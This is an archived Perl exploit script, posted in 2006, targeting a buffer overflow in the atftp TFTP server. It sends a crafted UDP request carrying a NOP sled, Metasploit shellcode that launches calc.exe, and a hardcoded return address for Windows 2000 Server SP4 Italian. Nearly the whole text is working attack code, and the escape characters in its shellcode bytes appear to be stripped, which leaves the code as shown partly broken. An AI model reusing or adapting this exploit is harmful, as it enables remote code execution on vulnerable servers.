atftp.txt
Posted on 06 December 2006
#!/usr/bin/perl -w #acaro[at]jervus.it #http://www.securityfocus.com/bid/21320 # # liuqx@nipc.org.cn is credited with the discovery of this vulnerability use IO::Socket; if(!($ARGV[1])) { print "Uso: atftp-19.pl <victim> <port> "; exit; } $victim = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]"; $pad = "x90"x63; # win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com $shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xf1". "xf1x59x06x83xebxfcxe2xf4x0dx19x1dx06xf1xf1xd2x43". "xcdx7ax25x03x89xf0xb6x8dxbexe9xd2x59xd1xf0xb2x4f". "x7axc5xd2x07x1fxc0x99x9fx5dx75x99x72xf6x30x93x0b". "xf0x33xb2xf2xcaxa5x7dx02x84x14xd2x59xd5xf0xb2x60". "x7axfdx12x8dxaexedx58xedx7axedxd2x07x1ax78x05x22". "xf5x32x68xc6x95x7ax19x36x74x31x21x0ax7axb1x55x8d". "x81xedxf4x8dx99xf9xb2x0fx7ax71xe9x06xf1xf1xd2x6e". "xcdxaex68xf0x91xa7xd0xfex72x31x22x56x99x01xd3x02". "xaex99xc1xf8x7bxffx0exf9x16x92x38x6ax92xdfx3cx7e". "x94xf1x59x06"; #$eip="x42x42x42x42"; $eip="xf4xf5xe3x75"; #call [ESP+28] in IMM32.dll on win2k Server SP4 Italian $mode = "netascii"; $exploit = "x00x02" . $pad . $shellcode . $eip . "�" . $mode . "�"; print $victim $exploit; print " + Malicious request sent ... "; sleep(2); print "Done. "; close($victim); exit;
